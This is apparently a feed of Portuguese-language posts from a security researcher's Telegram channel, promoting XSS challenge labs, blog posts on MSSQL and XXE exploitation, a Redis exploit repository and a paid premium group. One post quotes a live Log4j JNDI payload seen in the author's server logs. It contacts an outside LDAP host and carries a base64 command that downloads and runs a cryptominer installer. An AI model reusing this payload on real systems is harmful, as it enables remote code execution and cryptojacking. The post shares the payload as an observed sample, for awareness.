Bruno Menozzi (Zeroc00I)
Salve. Resolveu esse desafio de xss já? (https://brunomenozzi.com/desafios/xss.php) Me contaram que o sysadmin publicou a versão 2 dele. Dê uma olhada se teu payload ainda funciona! Se sim, manda o alert(1337) de novo! https://brunomenozzi.com/desafios/xss2.php
bom dia!
Desafio 3 de xss publicado agora agora
https://brunomenozzi.com/desafios/xss3.php

Nos comentários vou deixar a lista de parametros que os desafios usam (o foco dos labs é sempre não ter um guessing absurdo e mais lógica mesmo) (sim revisei manualmente e o parametro está ali!)
POST NOVO saindo do forno:
https://brunomenozzi.com/posts/MSSQL/alem_do_dumping/

No post "MSSQL: Além do Dumping", abordamos vulnerabilidades críticas no SQL Server que muitos pentesters desconhecem, indo muito além das técnicas tradicionais.

Além do dumping de tabelas e tentativas de RCE, o post cobre:

• SQL Links para movimento lateral entre servidores
• Ownership chaining entre bancos de dados
• Escalação de privilégios via impersonation
• Técnicas de leitura de arquivos via error-based
• Descoberta de conexões de rede ativas
• Abuso de cadeias de confiança (trust chains)

Revelamos como usuários com poucos privilégios podem se tornar sysadmin explorando configurações inadequadas e funcionalidades nativas do MSSQL, transformando uma simples SQL Injection em acesso completo ao ambiente.
Bruno Menozzi aka Zeroc00i
Alem do dumping
Aprofunde-se no MSSQL: indo além da SQL Injection e explorando vulnerabilidades.
Bruno Menozzi (Zeroc00I)
Tu manja de xss? Quero ver então! Que comece a saga dos mini labs! https://brunomenozzi.com/desafios/xss.php Manda aqui nos comentários um PRINT (sem expor o payload que tu usou) c/ um alert(1337)! Nada de self xss / alert no console do navegador ein hahah
Salve. Resolveu esse desafio de xss já? (https://brunomenozzi.com/desafios/xss.php)

Me contaram que o sysadmin publicou a versão 2 dele.

Dê uma olhada se teu payload ainda funciona!

Se sim, manda o alert(1337) de novo!

https://brunomenozzi.com/desafios/xss2.php
Bruno Menozzi (Zeroc00I)
Tu manja de xss? Quero ver então! Que comece a saga dos mini labs! https://brunomenozzi.com/desafios/xss.php Manda aqui nos comentários um PRINT (sem expor o payload que tu usou) c/ um alert(1337)! Nada de self xss / alert no console do navegador ein hahah
hahaha já temos alguns hackers na linha
Tu manja de xss? Quero ver então!

Que comece a saga dos mini labs!

https://brunomenozzi.com/desafios/xss.php

Manda aqui nos comentários um PRINT (sem expor o payload que tu usou) c/ um alert(1337)!

Nada de self xss / alert no console do navegador ein hahah
Lá se vai o Bruno compartilhar mais uma entrevista com o James Kettle. Me aguentem. Sou fã.

https://www.youtube.com/watch?v=KxWx9zJuHO0
YouTube
HTTP/1.1 Must Die - James Kettle (PortSwigger)
In this special episode of Seemposium LowLevel, Andrea and Gabriele sit down with James Kettle (aka albinowax), Director of Research at PortSwigger, and one of the most influential minds in web security today.

From his groundbreaking talk “HTTP/1.1 must…
Fala sério, essa engenharia social foi foda (pra quem não pegou a sacada, é que o JS consegue jogar payload pro ctrl + v das pessoas. O atacante criou uma página pra simular que deu erro, inventa um motivo e faz a pessoa colar o comando no executar do windows, tendo acesso ao PC da vítima e provavelmente ganhando uma persistência)
CVE-2025-49844 (RediShell) - Proof of Concept
Use-After-Free vulnerability in Redis Lua interpreter

https://github.com/raminfp/redis_exploit

Eu dei uma conferida no source, parece autentico e sem fins maliciosos, mas sempre verifiquem e assuma o risco por sua conta
GitHub
GitHub - raminfp/redis_exploit: CVE-2025-49844 (RediShell)
GitHub - raminfp/redis_exploit: CVE-2025-49844 (RediShell)
CVE-2025-49844 (RediShell). Contribute to raminfp/redis_exploit development by creating an account on GitHub.
Alguém on aí pra eu pedir um favor de teste no site (acessar e ficar navegando)?
https://brunomenozzi.com/
Bruno Menozzi (Zeroc00I)
ei, já almoçou?! Agora clica no link para ler o conteúdo que eu tinha te falado ontem! "Como sair dos duplicados em Bugbounty?" https://brunomenozzi.com/VIP/como_sair_de_duplicados_part1/ Essa é a parte 1 da nossa saga! Espero que gere alguns insights pra…
Quando falei em Log4j nesse post, saca só uns payloads que geralmente assim que tu expõe um IP pra internet ele começa a receber (vide imagem).

Isso independe do que tu ta executando na tua VPS. No meu caso o blog foi feito com hugo + o tema geekdocs.

Como vocês são hackers, eu vou de site estático mesmo hahaha

Payload:
User Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')
Qual teu modelo de trampo?
Anonymous Poll
72%
Remoto
17%
Presencial
11%
Hibrido
Galera, coloquem em suas agendas os dias e horários pra assistir essa galera de peso! Seguem mais infos:

É com imensa felicidade que anunciamos a OFFSEC FEST, realizada pela LICS | Liga de Cibersegurança da UNICAMP.

Trata-se de um evento online e gratuito, disponível para toda a comunidade de segurança da informação brasileira, na qual reforça a principal tarefa das universidades públicas: a democratização do acesso ao conhecimento.


Palestras:

05/11 - 19h: Francisco Marinho (IT.eam) | Além do SIEM, Técnicas modernas de evasão em ambientes monitorados

11/11 - 12h: Vinicius Vieira (Trustly) | OPSEC for Red Teamers, Como ficar fora da cadeia

19/11 - 19h: Rafael Félix (Hakai) | Utilização de LLMs para facilitar a análise de Malwares

26/11 - 12h: Daniel Marques (EY) | Amplificando ataques de phishing com I.A generativa

Link de inscrição: https://forms.gle/SSkYtabVhhHMDwHCA
Google Docs
OFFSEC FEST🦅 - 1ª Edição 2025🔐
Boas-vindas, Agente! Animado para a primeira edição da LICS OFFSEC Fest? Um mês emocionante com palestras de profissionais incríveis toda semana, contatos e novas experiências. Inscreva-se e chame seus amigos para participarem juntos !😎

LICS Recebe: Grandes…
Bruno Menozzi (Zeroc00I)
Salve pessoal! Entre hoje e amanhã vou postar no nosso site uma prévia textual com o assunto: "Como sair dos duplicados em Bugbounty?" O texto na página é uma forma de não deixar vocês de fora da saga que nosso grupo VIP está tendo (Imagem que enviei agora)!…
ei, já almoçou?!
Agora clica no link para ler o conteúdo que eu tinha te falado ontem!

"Como sair dos duplicados em Bugbounty?"

https://brunomenozzi.com/VIP/como_sair_de_duplicados_part1/

Essa é a parte 1 da nossa saga! Espero que gere alguns insights pra ti.
Bruno Menozzi aka Zeroc00i
Como evito duplicados em Bugbounty?
Descubra como se destacar no Bug Bounty e evitar relatórios duplicados, explorando metodologias e ferramentas de forma inovadora.
Salve pessoal!
Entre hoje e amanhã vou postar no nosso site uma prévia textual com o assunto:

"Como sair dos duplicados em Bugbounty?"

O texto na página é uma forma de não deixar vocês de fora da saga que nosso grupo VIP está tendo (Imagem que enviei agora)!

Se tu quiser uma explicação mais detalhada desse assunto e outros, cola com a gente no grupo VIP. Mais informações no link a seguir:

https://t.me/zeroc00i_news/475
Bruno Menozzi (Zeroc00I)
Já explorou XXE? E um XXE trigando um SSRF, usando uma DTD interna do windows? Tem muitos cenários além dos payloads básicos do XXE To construindo essa página aqui para falar um pouco mais disso. Alguns highlights: - Já encontrei em bugbounty um XXE no…
Print mostrando parte do blog falando sobre XXE:
Já explorou XXE? E um XXE trigando um SSRF, usando uma DTD interna do windows?

Tem muitos cenários além dos payloads básicos do XXE

To construindo essa página aqui para falar um pouco mais disso.

Alguns highlights:

- Já encontrei em bugbounty um XXE no parâmetro SAMLResponse de uma aplicação, que por padrão já espera um formato XML.
- Parece simples, mas muitas vezes explorar um XXE sabendo a sintaxe certa de uma requisição SOAP, pode te dar uma dor de cabeça.

Leia mais em: https://brunomenozzi.com/posts/XXE/introducao/
ALERTA DE SEGURANÇA
... a maioria é falso positivo, mas essa call aqui é boa pra ti!

Galera, de tarde fiz a abertura do grupo premium que eu havia falado uns dias atrás

Resolvi, agora com mais tempo, fazer um vídeo para vocês explicando sobre essa iniciativa de abertura de um grupo premium e o que te espera!

O link para a página é esse 💪:

https://lastlink.com/p/C68E8B1EA/
Media is too big
VIEW IN TELEGRAM
Bruno Menozzi (Zeroc00I)
Seguinte! Tô abrindo um Grupo Premium para elevarmos o nível. Quem me conhece sabe: eu não paro de estudar. A frequência que eu posto aqui não é nada perto dos cenários que eu construo e percorro até acertar. Antes, eu compartilhava mini conteúdos de forma…
🔥 Pessoal, inscrições pro Grupo premium abertas! 🔥

Acesse o link a seguir e garante tua vaga já!

https://lastlink.com/p/C68E8B1EA/

Ainda hoje vou falar com vocês por lá.
Nos vemos em breve =)

SIMBORAAA

By Zeroc00i
Lastlink
Grupo Premium do Zeroc00i
🔥 1º LOTE PROMOCIONAL: GRUPO VIP INFOSEC - R$ 15,00/mês
Se você busca um espaço para aprofundar seus conhecimentos em Infosec ao lado de pessoas com os mesmos objetivos, este é o seu lugar.
Este é o nosso Grupo VIP no Telegram, um círculo fechado onde o conteúdo…
Before
After
Back to Top